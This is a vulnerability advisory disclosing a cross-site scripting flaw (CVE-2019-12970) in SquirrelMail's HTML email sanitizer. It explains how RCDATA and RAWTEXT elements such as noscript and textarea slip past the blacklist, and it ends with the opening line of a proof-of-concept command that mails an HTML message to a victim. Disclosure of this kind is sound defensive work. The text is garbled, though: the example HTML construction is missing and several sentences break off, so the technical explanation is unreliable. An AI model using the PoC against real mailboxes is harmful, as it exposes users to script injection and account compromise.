Advisory ID: SYSS-2019-016
Manufacturer: The SquirrelMail Project
Affected Version(s): 1.4.22, SVN
Tested Version(s): SVN
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-04-17
Solution Date: N/A
Public Disclosure: 2019-07-01
CVE Reference: CVE-2019-12970
Author of Advisory: Moritz Bechler, SySS GmbH
SquirrelMail is a open-source webmail package.
The manufacturer describes the product as follows (see ):
"SquirrelMail is a standards-based webmail package written in PHP.
It includes built-in pure PHP support for the IMAP and SMTP protocols,
for maximum compatibility across browsers.
It has very few requirements and is very easy to configure and install.
SquirrelMail has all the functionality you would want from an email
client, including strong MIME support, address books, and folder
Due to insufficient HTML sanitization SquirrelMail is vulnerable to
Cross-Site-Scripting when viewing HTML mails.
When viewing e-mails in HTML mode (not active by default) SquirrelMail
applies a custom sanitization step in an effort to remove possibly
malicious script and other content from the viewed e-mail.
Due to improper handling of RCDATA and RAWTEXT type elements, the HTML
parser used in this process shows differences compared to real user
introduced which is not removed.
Due to the blacklisting nature of this mechnanism multiple such element
types are allowed and not correctly handled, including the elements
noembed, noframes, noscript and textarea.
When using a construction like
SquirrelMail's parser will consider the included tag as part
of the title attribute and therefore does not sanitize it's contents.
However, correctly parsing this, the element ends at the
first closing tag and the tag is actual content.
This allows having otherwise forbidden elements and attributes,
Proof of Concept (PoC):
Send a HTML email to a victim user:
attacker> mail -a "Content-type: text/html" -s "My little pony" \